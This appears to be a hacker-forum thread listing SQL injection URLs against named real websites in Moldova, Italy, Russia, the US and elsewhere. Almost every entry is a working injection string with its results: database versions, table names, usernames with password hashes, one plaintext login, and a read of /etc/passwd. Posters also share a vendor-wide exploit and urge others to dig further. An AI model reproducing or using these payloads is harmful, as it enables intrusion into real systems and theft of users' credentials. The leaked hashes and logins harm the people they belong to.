Code: http://www.minneapolisparks.org/default.asp?PageID=4&parkid=1+or+1=(SELECT+TOP+1+cast(LOGON_ID+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar)+from+users+where+USER_ID=2)--
SHOP. www.russki-shop.de Code: http://www.russki-shop.de/details.php?Id=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+users+--+ 4.1.10a-standard-log password column Code: http://www.russki-shop.de/details.php?Id=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(pwd,0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+users+--+ Code: 123 Guess the user yourself
Another buggy Moldovan shop, pacnet.md _http://www.pacnet.md/index.php?page=catalogue&cat_id=4&type_id=-1+UNION+SELECT+1,2,VERSION(),4,5,6,7,8/* 5.0.44-log, and that says it all
PR:4 Code: http://www.ipoteka.md/ro/law.php?ID=-5+union+select+1,2,3,4,5,6,7,8,9,concat_ws(char(58),user(),version(),database()),11,12,13,14,15,16/* [email protected]:4.1.19-standard-log:ipoteka_ipoteka PR:4 Code: http://www.rabota.md/vacancies/vacancyCategory.php?id=-1+union+select+concat_ws(char(58),user(),version(),database())/* coruptie@localhost:4.1.21:coruptie_rabota PR:3 Code: http://www.aquasystems.md/readarticle.php?id=-34+union+select+1,concat_ws(char(58),user(),version(),database()),3/* 6847@localhost:5.0.27:6847 Code: http://www.aquasystems.md/readarticle.php?id=-34+union+select+1,table_name,3+from+information_schema.tables+limit+1,1/* rgb_members Code: http://www.aquasystems.md/readarticle.php?id=-34+union+select+1,concat_ws(char(58),name,password),3+from+rgb_members/* OzzZZ:6055322b3c1cc50cef132211ca57aa75
Argumenty i Fakty (Moldova) PR:3 Code: http://www.aif.md/index.php?id=-240+union+select+1,2,concat_ws(char(58),user(),version(),database()),4,5,6,7,8/* aif@localhost:4.1.14:aif
Italy consunigo.it Code: http://www.consunigo.it/news_dettaglio.php?idn=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11,12,13,14,15,16/* 4.0.18-standard:consunigo:root@localhost cai.mo.it Code: http://www.cai.mo.it/soggiorno.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* 4.0.27-standard-log:Sql58426_1:[email protected] In the user table I found the fields id_user, user and email. I did not find a password field. ------------------------------------------------------------------- Powered By Giaretta Immobiliare a Venezia Vulnerability in the sezione.php script. Examples: Code: http://www.giaretta.com/sezione.php?lang=1&id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/* Code: http://www.cadeimiracoli.com/sezione.php?lang=1&id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/* Code: http://www.choosevenice.com/sezione.php?lang=1&id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/* 5.0.27:giaretta:dbuser@localhost
A site for hunters and anglers. Code: http://www.ohota-ribalka.com.ua/sthunt_1.htm?id=-14+UNION+SELECT+1,concat(username,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+phpbb_users/* + there is an open admin panel (no password required) + there is access to phpmyadmin (I posted the links in the Admin Panels section) Veles-tour travel agency Code: http://www.veles-tour.ru/animals.php?animal=-10+union+select+1,2,user()/* 4.0.27-log velestour [email protected]
Italy recensito.net Code: http://www.recensito.net/sezione.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user())/* 4.1.22-standard-log:Sql81530_4:[email protected] centroeinaudi.it Code: http://www.centroeinaudi.it/web/dinamico/sezione.php?id=-1+union+select+1,2,3,4,5,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),7,8,9,10/* 4.1.15-Debian_1ubuntu5-log:centroeinaudi:centroeinaudi@localhost cogepiemonte.it Code: http://www.cogepiemonte.it/news.php?f=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user())/* 4.0.26-debug:cogepiemonte:cogepiemonte@localhost I found only the news table editoriaragazzi.com Code: http://www.editoriaragazzi.com/sezione.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11/* 5.0.45-community-log:Sql137750_5:[email protected]
PR:4 Code: http://www.inmerc.nl/product.php?id=32&cid=&artikelno=-5422+union+select+1,2,3,4,5,concat_ws(char(58),user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* inmerc@localhost:5.0.37:inmerc
http://www.carvip.ru/autocatalog/?id=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3/* 5.0.41/carvip_new/carvip_new@localhost ------------------------------------------------------------------------------ http://www.cinema.variety.ru/actors.php?cid=2&aid=-1+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9,10,11,12,13/* 4.0.27-standard-log/variety_dvd/variety_dvd@localhost ------------------------------------------------------------------------------ http://stroyka.yandoo.ru/?sub=board&act=full&id=-1+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8,9,10,11,12,13,14/* 4.1.22/yandoo/yandoo@localhost ------------------------------------------------------------------------------ http://specserver.com/rus/notice.asp?groupID=-1+or+1=@@version Microsoft SQL Server 2005 - 9.00.3159.00 (X64) Mar 23 2007 20:11:35 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2) http://specserver.com/rus/notice.asp?groupID=-1+or+1=(select+system_user)-- specserver-2 http://specserver.com/rus/notice.asp?groupID=-1+or+1=(select+db_name())-- specserver-2
Code: http://culinary.org.ua/index.php?act=cat&id=-7+UNION+SELECT+1,2,3,4,version()/* http://referat.findplace.ru/?id=-600+union+select+1/*
sportspb.ru http://www.sportspb.ru/index.php?news=-1+union+select+concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary))/* 4.1.7-log/newsportspb/newsport@localhost http://www.sportspb.ru/index.php?news=-1+union+select+concat_ws(0x2F,login,pass,email)+from+user+limit+0,1/* login/hash/email jtsport/f4f068e71e0d87bf0ad51e6214ab84e9/[email protected] ----------------------------------------------------------------------------- http://www.kdo.ru/article.asp?ID=4918&CID=-1+or+1=@@version Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2) http://www.kdo.ru/article.asp?ID=4918&CID=-1+or+1=(select+system_user) kdoru http://www.kdo.ru/article.asp?ID=4918&CID=-1+or+1=(select+db_name()) kdoru http://www.kdo.ru/article.asp?ID=4918&CID=-1+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('tblGuestName','tblSmut','ARTICLES','BANNERS','CAT_GOODS','CAT_TOPIC','CONFIG_VAR','dtproperties','kdo_ddu_arenda','kdo_ddu_arenda_snimu')) and so on.
PR:5 Code: http://www.neurope.eu/view_news.php?id=-77501+union+select+1,concat_ws(char(58),user(),version(),database()),3,4,5,6,7,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/* neweuro_kostas@localhost:4.1.22-standard:neweuro_corporate PR:3 Code: http://www.it-bg.eu/viewtutorial.php?id=-8+union+select+1,2,3,4,5,6,concat_ws(char(58),user(),version(),database())/* itbgeu_itbgeu@localhost:5.0.45:itbgeu_itbg Code: http://www.it-bg.eu/viewtutorial.php?id=-8+union+select+1,2,3,4,5,6,table_name+from+information_schema.tables/* The output comes out very conveniently ) Code: admin users email ip forum_auth_access forum_users ibp_members ibp_moderators moderator ... Code: http://www.it-bg.eu/viewtutorial.php?id=-8+union+select+1,2,3,4,5,6,column_name+from+information_schema.columns/* Code: id name email ip_address username user_password user_email user_icq user ip ... Too lazy to dig further ( PR:3 Code: http://www.mypoolpal.eu/kiallitas/kiallitas.php?id=-1+union+select+1,2,concat_ws(char(58),user(),version(),database())/* mypoolpal@localhost:4.1.21-standard:mypoolpal Code: http://www.mortarinvestments.eu/vehicle.php?id=-119+union+select+1,2,3,4,concat_ws(char(58),user(),version(),database()),6,7,8/* [email protected]:5.0.44-log:zbozi_mortarinvestments_eu
DFA-link - repost -------deleted-------- Washington City Paper Code: http://www.washingtoncitypaper.com/display.php?id=34079-1 +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52+--+
http://www.abt.org/ - American Ballet Theatre - the Yanks' ballet. Code: http://www.abt.org/insideabt/news_display.asp?News_ID=1+or+1=(SELECT+TOP+1+cast(C_Username+as+nvarchar)%2B%27%3A%27%2Bcast(C_Password+as+nvarchar)+from+CMS_USER+WHERE+CMS_USER_ID=2)-- http://www.gettysburg.travel First time I've seen a .travel site... Code: http://www.gettysburg.travel/media/news_detail.asp?news_id=1+or+1=(SELECT+TOP+1+cast(user_id+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+tbl_user)--
http://www.kenandogulu.com.tr/fun/detay.asp?id=0+union+select+0,1,2+from+ help me work out the rest, it's a singer's site
fantasy-earth.ru http://fantasy-earth.ru/view.php?page=modul&mod=newscomm&id=-1'+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7,8/* 5.0.41/fe_site/fe_site@localhost http://fantasy-earth.ru/view.php?page=modul&mod=newscomm&id=-1'+union+select+1,2,3,concat_ws(0x2F,user,Password),5,6,7,8 +from+mysql.user+limit+0,1/* root/*7A75BB29F5CE202812218EEB56693A57AE394396 http://fantasy-earth.ru/view.php?page=modul&mod=newscomm&id=-1'+union+select+1,2,3,concat_ws(0x2F,LOGIN,PASSWORD,EMAIL),5,6,7,8+from +alter_odon.b_user/* admin/e10adc3949ba59abbe56e057f20f883e/[email protected] http://fantasy-earth.ru/view.php?page=modul&mod=newscomm&id=-1'+union+select+1,2,3,concat_ws(0x2F,LOGIN,PASSWORD,USE_MD5),5,6,7,8+from +alter_odon.b_mail_mailbox+limit+0,1/* test/6de+uCiE/N there is also IP.Board 2.2.2 present, but somehow I never found where the user passwords are stored there O_o dig around if anyone is interested: http://fantasy-earth.ru/view.php?page=modul&mod=newscomm&id=-1'+union+select+1,2,3,concat_ws(0x2F,column_name,table_name,table_schema),5,6,7,8+from+information_schema.columns+where+column_name='password'/* all tables that have a password column
http://www.marstonsdontcompromise.co.uk/ A site about beer; I especially liked the beer called "Pedigree" Code: http://www.marstonsdontcompromise.co.uk/site/news_story.asp?news_id=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+ashes_admin)-- Looks like I found a vulnerability: search for sites with the label "Site by EMAC2.SCREEN". Vulnerable scripts: all that contain "id=" . Mostly "xxx_list.asp?id=". Exploit: 1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+n varchar)+from+admins)-- By the way, the login and password are also always the same - guillaume : plop Examples: http://www.chiefinspiration.com Code: http://www.chiefinspiration.com/index.asp?news_id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)-- http://www.benoitoctave.com/ Code: http://www.benoitoctave.com/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)-- http://travel.youressentialmix.com Code: http://travel.youressentialmix.com/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)-- http://tv.blogilvy.be/ Code: http://tv.blogilvy.be/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)--
http://www.wagerweb.com Code: http://www.wagerweb.com/endorsement-detail.cfm?endorsmentid=13+union+select+1,2,user(),4,version(),6 Code: http://www.wagerweb.com/endorsement-detail.cfm?endorsmentid=13+union+select+1,2,3,4,table_name,6+from+information_schema.tables/* http://www.transporte3.com Code: http://www.transporte3.com/noticias/index.php?num=-1+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9/*